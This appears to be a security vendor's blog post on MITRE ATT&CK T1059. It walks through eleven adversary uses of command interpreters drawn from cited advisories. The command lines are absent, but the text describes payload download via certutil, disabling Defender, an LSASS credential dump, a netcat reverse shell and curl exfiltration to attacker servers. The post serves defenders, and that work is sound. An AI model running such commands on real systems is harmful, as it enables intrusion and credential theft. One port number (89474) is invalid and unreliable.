MITRE ATT&CK T1059 Command and Scripting Interpreter

In the Red Report 2024, we shared our insights on the top ten most prevalent MITRE ATT&CK techniques employed by adversaries. Following the publication of The Red Report 2024, we have initiated a blog series to delve into each of these ATT&CK techniques in more detail. This year, from a dataset of 600,000 observed malware samples, the Command and Scripting Interpreter technique stood out, accounting for 28% of cases. This translates to its presence in 174,118 malware samples, underlining its significant utilization by adversaries.

This blog post represents the first half of our series on the "Command and Scripting Interpreter" technique, where we dissect how adversaries leverage this method. To explore the sub-techniques associated with the T1059 Command and Scripting Interpreter technique, please click here for the second half of the blog.

Download the Red Report - Top Ten MITRE ATT&CK Techniques

Adversary Use of Command and Scripting Interpreters

Command and scripting interpreters serve as valuable tools for legitimate users, such as system administrators and programmers, enabling them to automate and optimize operational tasks. However, malicious actors can also exploit these interpreters as part of their attack campaigns to execute harmful code on both local and remote systems. This malicious use can encompass various activities, including collecting system data, running additional payloads, accessing sensitive information, and establishing persistence by initiating the execution of malicious binaries upon user logins.

Commonly integrated scripting languages like PowerShell, VBScript, and Unix shells are readily accessible to both authorized users and potential adversaries, as they come pre-installed with their respective operating systems. These languages possess the capability to directly interact with the underlying operating system and perform a range of tasks through the operating system's Application Programming Interface (API). Given their inherent nature within the system, adversaries can employ them discreetly, evading detection from weak process monitoring mechanisms and executing malicious actions.

Attackers abuse LOLBins, or "Living Off the Land Binaries," with command and scripting interpreters to carry out activities that range from file download and execution to reconnaissance and data exfiltration. LOLBins are legitimate system tools that are typically used for routine tasks by system administrators and advanced users. However, they also present a double-edged sword as these benign utilities can be repurposed by adversaries to facilitate various stages of an attack without immediate detection. Being natively available on the system, LOLBins can be used to bypass security policies that only block known malicious executables.

While the T1059 Command and Scripting Interpreter technique is commonly associated with the Execution tactic in the MITRE ATT&CK framework, it can also be applied across different tactics. In the examples provided, adversaries utilize various native operating system (OS) utilities, which can be accessed through the command line, to achieve objectives aligned with each tactic in the MITRE ATT&CK framework.

1. Initial Access

Using "certutil," adversaries may employ it to download a malicious file from a remote server and save it on a victim's computer. certutil is a command-line program installed as part of Certificate Services in Windows. It is intended for managing certificates, keys, and other aspects of a public key infrastructure (PKI).

As a malicious use of certutil, adversaries used the following command to download the Metasploit payload on the victim system in a vulnerability exploitation case disclosed in October 2023 [1]. 

The above command uses certutil to download a file named malware.exe from a remote server (hxxp://malicious_server:port/malware.exe) to a local directory (C:\Users\Public\malware.exe). The -urlcache option caches the URL, the -f switch forces the download even if the file already exists locally. The ampersand (&) chains this command with the next one, which uses the start command to run the newly downloaded malware in the background (/B), without opening a new window to hide it from users, from the Public directory on the user's machine.

2. Execution

Adversaries have been known to utilize the native Windows Management Instrumentation Command-line (WMIC) utility to execute malicious activities discreetly on a target system. By leveraging WMIC, which is a trusted administrative tool, adversaries can execute their code under the radar, which may not only facilitate immediate objectives like malicious code execution, data exfiltration or system reconnaissance but also support longer-term goals such as establishing persistence or compromising other systems on the network. An example of adversary use of WMIC was observed in a zero-day exploitation campaign uncovered in April 2023 as described by security researchers in reference [2]. 

The specific WMIC command used in the campaign was:

In this command, WMIC process call create instructs WMIC to execute a new process. The strings "vrbl1" and "vrbl2" are placeholders for two variables that have been defined earlier in the attack script and contain the actual commands or paths to the malicious scripts or programs to be executed. The usage of && is a method of chaining commands together, so after the first process is created, the second is run, followed by the exit command, which closes the WMIC environment.

3. Persistence

After initial access, adversaries often seek ways to maintain persistence on compromised systems. One method to achieve this is through the manipulation or alteration of Windows registry keys using the native Windows Command Shell. By modifying certain registry keys, malicious actors can ensure their code is executed every time the system starts, cementing their presence within the targeted environment.

Such tactics were notably employed by the LockBit 3.0 ransomware group, as detailed in the cybersecurity advisory (AA23-075A) issued by CISA in March 2023 [3]. The group executed a specific command to tamper with the system's privacy settings, reducing security measures and increasing their ability to persist unnoticed.

In this example, REG ADD is used to add a new registry entry under the HKLM\SOFTWARE\Policies\Microsoft\Windows\OOBE path. The entry named DisablePrivacyExperience is set to a value of 1 with a type of REG_DWORD, indicated by the /t REG_DWORD flag, effectively disabling certain privacy settings. The /d 1 switch specifies the data value to assign, while /f forces the addition without prompts for user confirmation.

By disabling these targeted privacy features, LockBit 3.0 not only enhances its ability to operate without triggering privacy warnings but also sets a foundation for persistent, long-term access to the victim's system. This command is just one example of how the Windows Command Shell can be wielded by adversaries to perform significant modifications to system configurations, ultimately facilitating ongoing malicious activities and potentially leading to further system or network compromise.

4. Privilege Escalation

In the domain of privilege escalation, adversaries often resort to the "schtasks" command for scheduling tasks with elevated privileges on Windows systems. This tactic is a key component in many ransomware strategies, as it enables the execution of malicious code with SYSTEM-level access. An illustrative case was disclosed in CISA's cybersecurity advisory AA23-136A in May 2023, detailing the tactics, techniques, and procedures (TTPs) of the BianLian ransomware [4].

Specifically, the ransomware employs the following command:

This command is strategically crafted to create a scheduled task that runs once under the SYSTEM account at precisely 4:43 AM. The purpose of this timing is to potentially avoid detection by executing during off-peak hours. The task triggers cmd.exe to execute rundll32.exe, which then calls upon an entry point named 'Entry' in a DLL labeled 'netsh.dll' located in the C:\ProgramData directory.

Notably, the use of 'netsh.dll' is deceptive; while 'netsh' is a legitimate Windows utility, it typically does not utilize a DLL with this name. Hence, this serves as a common example of masquerading to be a legitimate system component. This method illustrates the cunning nature of the attack, where adversaries disguise their malicious actions to gain unauthorized system privileges and execute their operations.

5. Defense Evasion

Utilizing sophisticated techniques, adversaries often seek to neutralize protective measures on a target system to evade detection and facilitate uninterrupted operation. A prime example of this is the disabling of Windows Defender, Microsoft's integrated antivirus solution. In a notable instance reported in April 2023, the BellaCiao malware, attributed to the APT group known as Charming Kitten, exhibited this behavior immediately upon deployment [5].

The specific method employed involved the execution of a PowerShell command designed to deactivate the real-time monitoring feature of Microsoft Defender. 

The attackers executed the following command: 

This command effectively instructs PowerShell to bypass execution policy restrictions (-exec bypass) and executes a script (-c) that configures the Windows Defender preferences (Set-MpPreference). 

The -DisableRealtimeMonitoring $true parameter specifically disables the real-time monitoring feature, a key component of Windows Defender's active protection capabilities. By deactivating this, the malware aims to persist on the infected system without being detected or removed by the antivirus software.

Download the Red Report - Top Ten MITRE ATT&CK Techniques

6. Credential Access

In a strategic move to exfiltrate sensitive credentials, adversaries may leverage native Windows utilities to exploit the Local Security Authority Subsystem Service (LSASS), which is critical for managing user logins and security policies. This approach enables attackers to harvest credentials covertly without relying on external tools, thus reducing their footprint and evading detection.

A notable instance of this tactic was observed in the Akira ransomware attack campaign, as reported in May 2023 [6]. The attackers executed a carefully crafted command using the Windows Command Processor (cmd.exe) to target and extract information from the LSASS process. 

The command operates as follows:

This command sequence initiates with cmd.exe, utilizing the /Q switch to enable quiet mode and /c to carry out the command specified by the string and then terminate. The 'for' loop filters processes to find 'lsass.exe', identifying the memory process ID of the LSASS. Subsequently, 'rundll32.exe' is employed to invoke a function from 'comsvcs.dll', a legitimate Windows DLL, with parameters that are intricately obfuscated. The chosen function, indicated by the hashed and obfuscated number, is designed to create a memory dump of the LSASS process. The output is redirected to a seemingly innocuous file (FP4.docx) in the Windows Temp directory, disguising the malicious activity. 

This sophisticated method allows the attackers to stealthily gather critical authentication credentials stored within the LSASS, facilitating further exploitation and lateral movement within the compromised network. 

7. Discovery

Leveraging native Windows commands, adversaries can meticulously collect comprehensive system data, scrutinize network configurations, and monitor active network connections. This approach is less likely to trigger security alerts as it involves using legitimate system utilities. 

In a notable incident in September 2023, attributed to the Lazarus group [7], a series of such commands were executed via a backdoor installed on the victim's system.

The specific commands executed were as follows:

• ifconfig: Retrieves network interface information, useful for mapping the network.
• netsh advfirewall firewall: Checks the firewall settings, identifying potential vulnerabilities.
• tasklist: Lists all running processes, useful for spotting security programs or potential targets for process hijacking.
• systeminfo: Gathers comprehensive system information, aiding in customizing further attacks.
• arp: Displays the ARP table, useful for understanding network connections and identifying other networked devices.

By executing these commands, the Lazarus group could have gained a deep understanding of the targeted system's environment, laying the groundwork for further exploitation and lateral movement within the network.

8. Lateral Movement

Adversaries engage in lateral movement to extend their reach beyond the initial point of compromise, seeking to gain control of additional systems within the target network. This step is crucial for escalating privileges, accessing sensitive information, and ensuring persistence within the network. Utilizing tools like "psexec," part of the Sysinternals Suite, for executing commands on remote Windows machines is a common strategy. It is particularly effective in interconnected environments, allowing attackers to systematically infiltrate multiple systems. 

As detailed in CISA's cybersecurity advisory (AA23-250A) from September 2023, prominent nation-state threat actors have leveraged this method while exploiting vulnerabilities CVE-2022-47966 and CVE-2022-42475 [8]. 

The executed command was:

This command employs psexec.exe for remote execution, with the -i option enabling interaction with the remote system's desktop and -s running the process with System account privileges. The command targets mmc.exe, the Microsoft Management Console, using the Task Scheduler snap-in (taskschd.msc). This allows the attackers to manipulate tasks and processes on the target machine. 

9. Collection

Adversaries leverage collection attack techniques primarily to gather valuable data from compromised systems, which can include credentials, system information, and other sensitive details. This intelligence is crucial for furthering their malicious objectives, whether it be for espionage, data theft, or facilitating subsequent attacks. 

In a notable instance involving the exploitation of Citrix CVE-2023-3519, detailed in CISA's cybersecurity advisory (AA23-201A), such a technique was used effectively [9]. The attackers employed the following command to compress and encrypt the collected data, preparing it for secure exfiltration:

This command sequence begins with 'tar -czvf', creating a compressed 'tarball' of the data specified in '/var/tmp/all.txt'. The output is then encrypted using 'openssl' with triple DES ('des3'), a method that significantly enhances the security of the data. The inclusion of '-salt' in the command generates a random salt for the encryption, and '-k <>' specifies the encryption key, further safeguarding the information. This approach not only secures the data against interception during exfiltration but also maintains the integrity and confidentiality of the information collected.

10. Command and Control

Adversaries often utilize batch scripts that incorporate built-in OS utilities to establish covert communication channels with their control servers. This tactic is pivotal for maintaining persistent access, controlling compromised systems remotely, and executing further malicious activities.

A notable example from December 2023 involves the use of the Meterpreter module's 'portfwd' command to set up reverse port forwarding, as seen in a cyber attack incident [10].

The specific command used was:

This command facilitates a reverse port forwarding setup, where traffic to port 89474 on the victim's system is redirected to port 4453 on the IP address 192.169.6.122, effectively creating a discreet communication tunnel to the adversary's C2 infrastructure.

Additionally, analysis of 'sliver-client.log' revealed the use of 'netcat' (nc) for creating a reverse shell:

Here, 'nc' is employed to execute '/bin/bash', enabling shell access to the attacker at IP 104.200.67.3 on port 1608. The '2> /dev/null' portion ensures that error messages are suppressed, enhancing the stealthiness of the connection. These methods are key in establishing reliable and stealthy command and control channels, allowing attackers to exert sustained influence over compromised systems without detection.

11. Exfiltration

In a targeted effort to exfiltrate sensitive data, adversaries often compress and transmit stolen information to a command and control (C2) server. This method ensures efficient data transfer while minimizing detection. A recent example involves the use of a PowerShell cmdlet for data archiving, followed by the 'curl' command for transmission, as identified in an incident [11]. The adversaries executed the following process:

Firstly, the collected data is archived into a ZIP file using PowerShell's System.IO.Compression.ZipFile cmdlet. The file is named uniquely to the compromised system, such as "BunnyLogs_<hostname>.zip". This step consolidates the gathered data into a single, compressed file, making it easier to handle and transfer.

Subsequently, the ZIP archive is exfiltrated using the 'curl' command, which is executed via 'cmd.exe'. The specific command line is:

This command instructs 'curl' to upload the file to the attacker's C2 server at the specified URL. The use of -F in the curl command indicates that the file is being uploaded as form data, a common method for transferring files over HTTP. By leveraging these native tools and common web protocols, the attackers efficiently mask their malicious activities, blending in with legitimate network traffic to avoid raising suspicion. This technique underscores the strategic approach of adversaries in the final stages of a data breach, focusing on stealth and efficiency in the exfiltration of sensitive information.

References

[1] “WinSock File Transfer Protocol Vulnerability Exploited,” eSentire, Oct. 31, 2023.  https://www.esentire.com/blog/winsock-file-transfer-protocol-vulnerability-exploited

[2] B. Toulas, “WinRAR zero-day exploited since April to hack trading accounts,” BleepingComputer, Aug. 23, 2023.  https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/

[3] “StopRansomware: LockBit 3.0,” Cybersecurity and Infrastructure Security Agency CISA.  https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

[4] “StopRansomware: BianLian Ransomware Group,” Cybersecurity and Infrastructure Security Agency CISA.  https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

[5] M. Zugec, “Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware,” Bitdefender Blog.  https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/

[6] P. Jaramillo, “Akira Ransomware is ‘bringin’ 1988 back,’” Sophos News, May 09, 2023.  https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/

[7] B. Toulas, “Lazarus hackers breach aerospace firm with new LightlessCan malware,” BleepingComputer, Sep. 29, 2023.  https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/

[8] “Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475,” Cybersecurity and Infrastructure Security Agency CISA.  https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a

[9] “Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells”  https://www.cisa.gov/sites/default/files/2023-07/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf

[10] “Lets Open(Dir) Some Presents: An Analysis of a Persistent Actor’s Activity,” The DFIR Report, Dec. 18, 2023.  https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/

[11] N. Shivtarkar and S. Singh, “BunnyLoader, the newest Malware-as-a-Service,” Sep. 29, 2023.  https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service